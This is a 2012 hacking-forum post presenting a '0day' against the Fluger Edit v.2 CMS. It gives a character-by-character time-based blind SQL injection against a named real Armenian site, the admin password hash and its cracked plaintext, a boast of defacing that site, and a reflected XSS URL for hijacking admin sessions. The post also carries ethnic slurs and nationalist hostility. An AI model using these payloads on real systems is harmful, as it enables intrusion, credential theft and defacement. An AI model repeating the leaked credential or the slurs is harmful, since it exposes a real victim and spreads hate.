Anti-armenia.ORG - Forumlar - 0day for fucked fluger arm bitch studio

Forumlar / Hacking Platform / Exploits & Vulnerabilities / 0day for fucked fluger arm bitch studio

Istifadəçi

2012-09-03 19:17 GMT

BlackMinD

Pr0grammer

Mesaj Sayı : 1677

Mövzu Sayı :

Rep Ver :

Rep Sayı : 62

Indi Saytda : Durum

Cinsiyyət : Oğlan

Şəhər : KARABAKH IS AZERBAIJAN!

Ölkə :

Məslək :

Yaş :

Mesaj :

0day for fucked fluger arm bitch studio

http://pastebin.com/8RwCW8fS

Kod:
=====================================================
Vulnerable Software: Fluger Edit v.2 || administration software
Vendor: http://www.fluger.com/
Software License: Commercial
Vulnerabilities: Blind SQL Injection And XSS
Tested: In Wild
=====================================================

Dork :
Designed and developed by Fluger IT
All right reserved © | 2004 - 2012

************** FOR OUR BRO RAMIL SEFEROV! ************************
@OPERATION BY AZERBAIJAN BLACK HATZ: *WIPEN'EM purgens!*
I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=
********************** REALLY! ********************************************
******************ENJOY MAXIMALLY**************************************

======================================================
FULLY disclosured Real Exploitation examples:
GPC MUST BE=OFF

Theris Blind SQLi vulnerability on login page:

http://www.artclima.am/edit/ <===(Admin panel)

Vulnerable scenario is exist here: http://www.artclima.am/edit/config_secure/verify.php

(Sorry i have no access to source code)

CMS looks like: http://s61.radikal.ru/i172/1209/29/bb88e6891edf.png

Due authentication mechanism you can't bypass login form by sending:
'or''='

Instead of you can use Time Based Way to obtain logins:password from admin table.
Here we go:

Print screens: http://s010.radikal.ru/i314/1209/32/9dae8ab77a3d.png

http://www.artclima.am/edit/index.php?error

Headers:

Host: www.artclima.am
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: PHPSESSID=:$
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

POST DATA:

username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

*REPLAY*

loginde Blind varidir.
Bypass getmir.

Time Based RuleZ!

www.artclima.am/edit/index.php?error

columnlar:

user
password

table: admin

=========================================

1 user var:

//TRUE
username=' or (select if(count(*)='1',sleep(30),0) from admin)-- and 5='5&password=sikdir

cekek logini

login: admin

//TRUE

username=' or (select if(user='admin',sleep(30),0) from admin)-- and 5='5&password=sikdir

parolu cekek:

=========================================
1-ci simvol: e

username=' or (select if(substr(password,1,1)='e',sleep(30),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

2-ci simvol: 0

username=' or (select if(substr(password,2,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

3-cu simvol: 4

username=' or (select if(substr(password,3,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

4-cu simvol: 4

username=' or (select if(substr(password,4,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
5-ci simvol: 6

username=' or (select if(substr(password,5,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
6-ci simvol: 5

username=' or (select if(substr(password,6,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
7-ci simvol: 0

username=' or (select if(substr(password,7,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
8-ci simvol: a

username=' or (select if(substr(password,8,1)='a',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
9-cu simvol: 5

username=' or (select if(substr(password,9,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================

10-cu simvol: 6

username=' or (select if(substr(password,10,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

11-ci simvol: 7

username=' or (select if(substr(password,11,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

12-ci simvol: e

username=' or (select if(substr(password,12,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
13-cu simvol: d

username=' or (select if(substr(password,13,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

yoxla sonra

=========================================
14-cu simvol: 2

username=' or (select if(substr(password,14,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
15-ci simvol: b

username=' or (select if(substr(password,15,1)='b',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

16-ci simvol: 2

username=' or (select if(substr(password,16,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

17-ci simvol: d

username=' or (select if(substr(password,17,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================
18-ci simvol: 0

username=' or (select if(substr(password,18,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

19-cu simvol: 4

username=' or (select if(substr(password,19,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

20-ci simvol: 3

username=' or (select if(substr(password,20,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
21-ci simvol: 0

username=' or (select if(substr(password,21,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
22-ci simvol: 3

username=' or (select if(substr(password,22,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir
=========================================

23-cu simvol: e

username=' or (select if(substr(password,23,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
24-cu simvol: 3

username=' or (select if(substr(password,24,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

25-ci simvol: 7

username=' or (select if(substr(password,25,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

26-ci simvol: 9

username=' or (select if(substr(password,26,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

27-ci simvol: 3

username=' or (select if(substr(password,27,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

28-ci simvol: d

username=' or (select if(substr(password,28,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
29-cu simvol: f

username=' or (select if(substr(password,29,1)='f',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
30-cu simvol: d

username=' or (select if(substr(password,30,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================
31-ci simvol: 9

username=' or (select if(substr(password,31,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

32-ci simvol: 5

username=' or (select if(substr(password,32,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

=========================================

Verification: +

//TRUE
username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir

MD5: e044650a567ed2b2d04303e3793dfd95

Resolves to: price777

Sure! I will "rm"-it too with great pleasure!

Rmned: http://zone-h.org/mirror/id/18295382

Second way: Session Hijack to gain access to admin panel:

XSS:
http://www.artclima.am/edit/admin.php?page=news_admin/news&type=25&type_name=Title%20Ptoduct%3Cscript%3Ealert%28%22OwnEd%20By%20AkaStep%22%29;%3C/script%3E&type_admin=Catalog&empty_sess=1

Print Screen:
http://s61.radikal.ru/i173/1209/26/8f9f482ff32d.png

From source code of page:

<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="h350">
<tr valign="top">
<td class="bg_content">
<div id="printarea">
<table cellpadding="0" cellspacing="0" border="0" summary="" style="height: 24px;" width="100%" class="tabfree">
<tr>
<td class="tabcurrent">Title Ptoduct<script>alert("OwnEd By AkaStep");</script></td>
<td> </td>
</tr>
</table>
<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="boxborder" >

==========================THE END=========================

SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
===========================================================

/AkaStep

02.09.2012
]